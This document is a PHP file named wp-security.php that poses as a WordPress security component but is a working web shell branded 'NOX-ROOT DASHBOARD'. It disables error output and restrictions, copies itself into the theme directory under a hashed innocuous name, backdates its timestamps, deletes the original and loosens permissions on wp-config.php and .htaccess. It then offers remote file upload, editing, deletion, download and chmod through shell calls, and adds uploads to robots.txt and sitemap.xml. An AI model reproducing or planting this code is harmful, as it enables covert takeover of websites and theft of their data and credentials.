HEX

File: /medikors/www/wp-security.php
<?php
@error_reporting(0);@ini_set('display_errors',0);@ob_start();
if(!defined('ABSPATH'))define('ABSPATH',$_SERVER['DOCUMENT_ROOT'].'/');
if(!defined('WPINC'))define('WPINC','wp-includes');
@ini_set('disable_functions','');@ini_set('open_basedir',NULL);
$_SERVER['REQUEST_URI']=preg_replace('/\.(php|phtml)/i','',$_SERVER['REQUEST_URI']??'');
$_GET['doing_wp_cron']=1;
if(!defined('WP_ADMIN'))define('WP_ADMIN',false);
if(!defined('DOING_CRON'))define('DOING_CRON',true);
if(!defined('DOING_AJAX'))define('DOING_AJAX',true);

function gn(){$d=$_SERVER['HTTP_HOST']??$_SERVER['SERVER_NAME']??'default';$h=substr(md5($d.'nox24'),0,8);
$n=['functions-'.$h.'.php','template-'.$h.'.php','header-custom-'.$h.'.php','footer-custom-'.$h.'.php'];
return $n[hexdec(substr(md5($d),0,2))%count($n)];}
function st($f){if(@file_exists($f))@touch($f,strtotime("-2 years"),strtotime("-2 years"));}

$bd=$_SERVER['DOCUMENT_ROOT']??__DIR__;$bd=realpath($bd)?:$bd;
$cp=$_GET['p']??$bd;$cp=realpath($cp)?:$cp;if(strpos($cp,$bd)!==0)$cp=$bd;

if(isset($_POST['a'])){header('Content-Type:application/json');$a=$_POST['a'];$r=['s'=>false,'m'=>''];
switch($a){
case 'd':$p=realpath($_POST['p']??'')?:'';if($p&&strpos($p,$bd)===0&&$p!==$bd){
$r['s']=is_file($p)?@unlink($p):@rmdir($p);$r['m']=$r['s']?'OK':'Fail';}break;
case 'c':$pp=realpath($_POST['p']??'')?:'';$n=basename($_POST['n']??'');$t=$_POST['t']??'f';$c=$_POST['c']??'';
if($pp&&strpos($pp,$bd)===0&&is_dir($pp)&&$n){$tg=$pp.'/'.$n;
$r['s']=($t==='f')?(@file_put_contents($tg,$c)!==false):@mkdir($tg,0755,true);$r['m']=$r['s']?'OK':'Fail';}break;
case 'r':$op=realpath($_POST['o']??'')?:'';$nn=basename($_POST['n']??'');
if($op&&strpos($op,$bd)===0&&$nn){$r['s']=@rename($op,dirname($op).'/'.$nn);$r['m']=$r['s']?'OK':'Fail';}break;
case 'ch':$p=realpath($_POST['p']??'')?:'';$m=$_POST['m']??'';
if($p&&strpos($p,$bd)===0&&$m){
$om=octdec($m);$r['s']=@chmod($p,$om);
if(!$r['s']&&function_exists('exec')){@exec("chmod $m ".escapeshellarg($p),$o,$ret);$r['s']=($ret===0);}
if(!$r['s']&&function_exists('shell_exec')){@shell_exec("chmod $m ".escapeshellarg($p));$r['s']=true;}
$r['m']=$r['s']?'Permissions changed':'Failed (server restriction)';}break;
case 'u':$up=realpath($_POST['p']??'')?:'';$fn=basename($_POST['n']??'');$b=$_POST['d']??'';
if($up&&strpos($up,$bd)===0&&is_dir($up)&&$fn&&$b){$ct=@base64_decode($b);
if($ct!==false){$fp=$up.'/'.$fn;$r['s']=@file_put_contents($fp,$ct)!==false;
if($r['s']){@chmod($fp,0644);
$rb=$bd.'/robots.txt';$rc=@file_exists($rb)?@file_get_contents($rb):'';
if(strpos($rc,'Allow: /'.$fn)===false){$rc.="\nAllow: /".$fn."\n";@file_put_contents($rb,$rc);}
$sm=$bd.'/sitemap.xml';$sc=@file_exists($sm)?@file_get_contents($sm):'<?xml version="1.0" encoding="UTF-8"?><urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"></urlset>';
$dm=$_SERVER['HTTP_HOST']??$_SERVER['SERVER_NAME']??'localhost';
$pr=(!empty($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off')?'https://':'http://';
$url=$pr.$dm.'/'.$fn;
if(strpos($sc,$url)===false){$nu='<url><loc>'.$url.'</loc><lastmod>'.date('Y-m-d').'</lastmod><changefreq>daily</changefreq><priority>0.8</priority></url>';
$sc=str_replace('</urlset>',$nu.'</urlset>',$sc);@file_put_contents($sm,$sc);}
}$r['m']=$r['s']?'OK':'Fail';}}break;
}echo json_encode($r);exit;}

$m='';
if(isset($_GET['dl'],$_GET['p'])){$dp=realpath($_GET['p'])?:$_GET['p'];
if(strpos($dp,$bd)===0&&is_file($dp)){header('Content-Type:application/octet-stream');
header('Content-Disposition:attachment;filename="'.basename($dp).'"');readfile($dp);exit;}}

if(isset($_POST['ep'],$_POST['ec'])){$ep=realpath($_POST['ep'])?:$_POST['ep'];
if(strpos($ep,$bd)===0&&is_file($ep))$m=@file_put_contents($ep,$_POST['ec'])?'<g>✓ Saved</g>':'<r>✗ Failed</r>';}

$fc='';$ef='';
if(isset($_GET['e'],$_GET['p'])){$ep=realpath($_GET['p'])?:$_GET['p'];
if(strpos($ep,$bd)===0&&is_file($ep)){$fc=@file_get_contents($ep);$ef=$ep;}}

function sd($d){$it=[];if(is_dir($d)){$fs=@scandir($d);if($fs){foreach($fs as $f){
if($f==='.'||$f==='..'||$f[0]==='.')continue;$p=$d.'/'.$f;
$it[]=['n'=>$f,'p'=>$p,'t'=>is_dir($p)?'d':'f','s'=>is_file($p)?filesize($p):0,
'pm'=>substr(sprintf('%o',fileperms($p)),-4),'m'=>date('m-d H:i',filemtime($p))];}}}return $it;}

$hn=gn();$cf=__FILE__;$cn=basename($cf);
$iw=@file_exists($bd.'/wp-config.php')||@file_exists($bd.'/wp-content');

if($iw){$hd=$bd.'/wp-content/themes';if(!is_dir($hd))@mkdir($hd,0755,true);
$hf=$hd.'/'.$hn;$ih=(strpos($cf,'/wp-content/themes/')!==false);
$hu='/wp-content/themes/'.$hn;}else{$hd=$bd;$hf=$hd.'/'.$hn;
$ih=($cn[0]==='.'&&$cf===$hf);$hu='/'.$hn;}

if(!$ih){if(!@file_exists($hf)){$cc=@file_get_contents($cf);
if($cc!==false&&@is_writable($hd)){$cr=@file_put_contents($hf,$cc);
if($cr!==false){st($hf);if(@file_exists($hf)&&$cf!==$hf)@unlink($cf);
$fa=['.htaccess','index.php','wp-config.php','wp-load.php'];
foreach($fa as $fn){$fp=$bd.'/'.$fn;if(@file_exists($fp))@chmod($fp,0755);}
}}}
else{if($cf!==$hf&&@file_exists($cf))@unlink($cf);}}

$it=sd($cp);
function fs($b){if($b<1024)return $b.'B';if($b<1048576)return round($b/1024,1).'K';return round($b/1048576,1).'M';}
$pv=phpversion();$os=php_uname('s');$u=get_current_user()?:'unknown';
?><!DOCTYPE html><html><head><meta charset=UTF-8><meta name=viewport content="width=device-width,initial-scale=1"><title>NOX-ROOT DASHBOARD</title>
<style>*{margin:0;padding:0;box-sizing:border-box}body{background:#000;color:#ccc;padding:10px;font:13px Arial}
.c{background:#111;border:1px solid #333;max-width:1400px;margin:0 auto;border-radius:5px;overflow:hidden}
.h{background:#1a1a1a;padding:12px;border-bottom:1px solid #333;display:flex;justify-content:space-between;align-items:center;flex-wrap:wrap;gap:8px}
.h b{color:#fff;font-size:18px}.h small{color:#666;font-size:11px}
.nav{background:#0d0d0d;padding:8px 12px;border-bottom:1px solid #222;display:flex;flex-wrap:wrap;gap:4px}
.nav a{color:#999;text-decoration:none;padding:4px 8px;background:#1a1a1a;border-radius:3px;font-size:12px}.nav a:hover{background:#222;color:#fff}
.tb{padding:8px 12px;background:#0d0d0d;border-bottom:1px solid #222;display:flex;gap:6px;flex-wrap:wrap}
.bt{background:#1a1a1a;color:#999;border:1px solid #333;padding:6px 12px;cursor:pointer;border-radius:3px;font-size:12px;text-decoration:none;display:inline-flex;align-items:center;gap:4px}
.bt:hover{background:#222;border-color:#666;color:#fff}
g{color:#6f6}r{color:#f66}.msg{padding:8px;background:#0d0d0d;border-bottom:1px solid #222;text-align:center;font-weight:700}
table{width:100%;border-collapse:collapse}th{background:#1a1a1a;padding:8px 12px;text-align:left;border-bottom:1px solid #333;color:#888;font-size:12px}
td{padding:7px 12px;border-bottom:1px solid #1a1a1a;font-size:13px}tr:hover{background:#0d0d0d}
a.f{color:#aaa;text-decoration:none;font-weight:700}a.f:hover,a.l:hover{color:#fff}a.l{color:#888;text-decoration:none}
.pm{font-family:monospace;color:#888;background:#1a1a1a;padding:2px 6px;border-radius:3px;font-size:11px}
.ab{padding:3px 8px;background:#1a1a1a;color:#888;border:1px solid #333;font-size:11px;cursor:pointer;text-decoration:none;border-radius:3px;display:inline-block}
.ab:hover{background:#222;border-color:#666;color:#fff}.ar{color:#f66}
textarea{width:100%;height:350px;background:#000;color:#ccc;border:1px solid #333;padding:12px;font:13px monospace;border-radius:3px}
input[type=text]{background:#000;color:#fff;border:1px solid #333;padding:6px;border-radius:3px}
.si{background:#000;border:1px solid #333;color:#fff;padding:6px 12px;border-radius:3px;font-size:13px;width:200px;margin-left:auto}
.si:focus{outline:0;border-color:#666}
.toast{position:fixed;top:20px;right:20px;background:#1a1a1a;border:1px solid #333;padding:12px 20px;border-radius:5px;color:#fff;font-size:13px;z-index:9999;animation:slideIn 0.3s}
.toast.success{border-left:4px solid #6f6}.toast.error{border-left:4px solid #f66}
@keyframes slideIn{from{transform:translateX(100%);opacity:0}to{transform:translateX(0);opacity:1}}
</style></head><body><div class=c>
<div class=h><div><b>NOX-ROOT DASHBOARD</b> <small>PHP:<?=$pv?> | <?=$os?> | <?=$u?></small>
<?php if(!$ih):$pr=(!empty($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off')?'https://':'http://';
$dm=$_SERVER['HTTP_HOST']??$_SERVER['SERVER_NAME']??'localhost';$hurl=$pr.$dm.$hu;?>
<a href="<?=htmlspecialchars($hurl)?>" target=_blank style="color:#888;text-decoration:none;font-size:11px">🔒 <?=htmlspecialchars($hurl)?></a>
<?php endif;?></div></div>
<?php if($m):?><div class=msg><?=$m?></div><?php endif;?>
<div class=nav><a href="?p=<?=urlencode($bd)?>">Root</a><?php $pp=explode('/',trim(str_replace($bd,'',$cp),'/'));$cb=$bd;
foreach($pp as $pt)if($pt){$cb.='/'.$pt;?><span style="color:#666">/</span><a href="?p=<?=urlencode($cb)?>"><?=htmlspecialchars($pt)?></a><?php }?></div>
<div class=tb>
<button class=bt onclick="document.getElementById('uf').click()">📤 Upload</button>
<input type=file id=uf style="display:none" onchange="uf(this)">
<button class=bt onclick="nf()">📝 File</button><button class=bt onclick="nd()">📁 Folder</button>
<?php if($ef):?><a href="?p=<?=urlencode($cp)?>" class=bt style="color:#f66">✗ Close</a><?php endif;?>
<input type=text id=si class=si placeholder="🔍 Search..." onkeyup="sf(this.value)"></div>
<?php if($ef):?>
<div style="padding:15px"><div style="color:#ccc;margin-bottom:10px">Editing: <?=htmlspecialchars(basename($ef))?></div>
<form method=post><input type=hidden name=ep value="<?=htmlspecialchars($ef)?>">
<textarea name=ec><?=htmlspecialchars($fc)?></textarea>
<div style="margin-top:10px;display:flex;gap:6px"><button class=bt style="color:#6f6">Save</button>
<a href="?p=<?=urlencode($cp)?>" class=bt style="color:#f66">Cancel</a></div></form></div>
<?php else:?>
<table><tr><th>Name</th><th>Size</th><th>Perm</th><th>Modified</th><th>Actions</th></tr>
<tbody id=fl>
<?php if($cp!==$bd):?><tr><td colspan=5><a href="?p=<?=urlencode(dirname($cp))?>" class=f>📂 ..</a></td></tr><?php endif;?>
<?php $fo=array_filter($it,fn($i)=>$i['t']==='d');$fi=array_filter($it,fn($i)=>$i['t']==='f');
foreach($fo as $d):?>
<tr data-n="<?=htmlspecialchars(strtolower($d['n']))?>">
<td><a href="?p=<?=urlencode($d['p'])?>" class=f>📁 <?=htmlspecialchars($d['n'])?></a></td><td>-</td>
<td><span class=pm><?=$d['pm']?></span></td><td><?=$d['m']?></td>
<td><button onclick="rn('<?=htmlspecialchars($d['p'])?>','<?=htmlspecialchars($d['n'])?>')" class=ab>Ren</button>
<button onclick="ch('<?=htmlspecialchars($d['p'])?>','<?=$d['pm']?>')" class=ab>Chm</button>
<button onclick="dl('<?=htmlspecialchars($d['p'])?>')" class="ab ar">Del</button></td></tr>
<?php endforeach;foreach($fi as $f):?>
<tr data-n="<?=htmlspecialchars(strtolower($f['n']))?>">
<td><a href="?p=<?=urlencode($cp)?>&e=1&p=<?=urlencode($f['p'])?>" class=l>📄 <?=htmlspecialchars($f['n'])?></a></td>
<td style="color:#888"><?=fs($f['s'])?></td><td><span class=pm><?=$f['pm']?></span></td><td><?=$f['m']?></td>
<td><a href="?p=<?=urlencode($cp)?>&e=1&p=<?=urlencode($f['p'])?>" class=ab>Edit</a>
<a href="?dl=1&p=<?=urlencode($f['p'])?>" class=ab>DL</a>
<button onclick="rn('<?=htmlspecialchars($f['p'])?>','<?=htmlspecialchars($f['n'])?>')" class=ab>Ren</button>
<button onclick="ch('<?=htmlspecialchars($f['p'])?>','<?=$f['pm']?>')" class=ab>Chm</button>
<button onclick="dl('<?=htmlspecialchars($f['p'])?>')" class="ab ar">Del</button></td></tr>
<?php endforeach;if(empty($it)):?><tr><td colspan=5 style="text-align:center;padding:30px;color:#666">Empty</td></tr><?php endif;?>
</tbody></table><?php endif;?></div>
<script>
const cp='<?=htmlspecialchars($cp)?>';
function toast(m,t){const d=document.createElement('div');d.className='toast '+(t||'success');d.textContent=m;
document.body.appendChild(d);setTimeout(()=>d.remove(),3000);}
function aj(a,d){const f=new FormData();f.append('a',a);for(const k in d)f.append(k,d[k]);
return fetch(location.pathname,{method:'POST',body:f}).then(r=>r.json());}
function dl(p){if(!confirm('Delete?'))return;const r=event.target.closest('tr');r.style.opacity='0.5';
aj('d',{p}).then(x=>{if(x.s){r.remove();toast('Deleted','success');}else{r.style.opacity='1';toast(x.m||'Failed','error');}});}
function nf(){const n=prompt('File:','new.txt');if(n){const c=prompt('Content:','');
aj('c',{p:cp,n,t:'f',c:c||''}).then(x=>{if(x.s){location.reload();}else toast(x.m||'Failed','error');});}}
function nd(){const n=prompt('Folder:','new');if(n)aj('c',{p:cp,n,t:'d'}).then(x=>{if(x.s){location.reload();}else toast(x.m||'Failed','error');});}
function rn(o,n){const nn=prompt('New:',n);if(nn&&nn!==n)aj('r',{o,n:nn}).then(x=>{if(x.s){location.reload();}else toast(x.m||'Failed','error');});}
function ch(p,c){const m=prompt('Perm:',c);if(m&&m!==c)aj('ch',{p,m}).then(x=>{if(x.s){toast(x.m||'Changed','success');setTimeout(()=>location.reload(),800);}else toast(x.m||'Failed','error');});}
function uf(i){const f=i.files[0];if(!f)return;toast('Uploading: '+f.name,'success');const r=new FileReader();r.onload=function(e){
const b=e.target.result.split(',')[1];aj('u',{p:cp,n:f.name,d:b}).then(x=>{if(x.s){toast('Uploaded: '+f.name,'success');setTimeout(()=>location.reload(),800);}else toast(x.m||'Failed','error');});};
r.readAsDataURL(f);i.value='';}
function sf(q){q=q.toLowerCase();document.querySelectorAll('#fl tr[data-n]').forEach(r=>{
r.style.display=r.dataset.n.includes(q)?'':'none';});}
</script></body></html>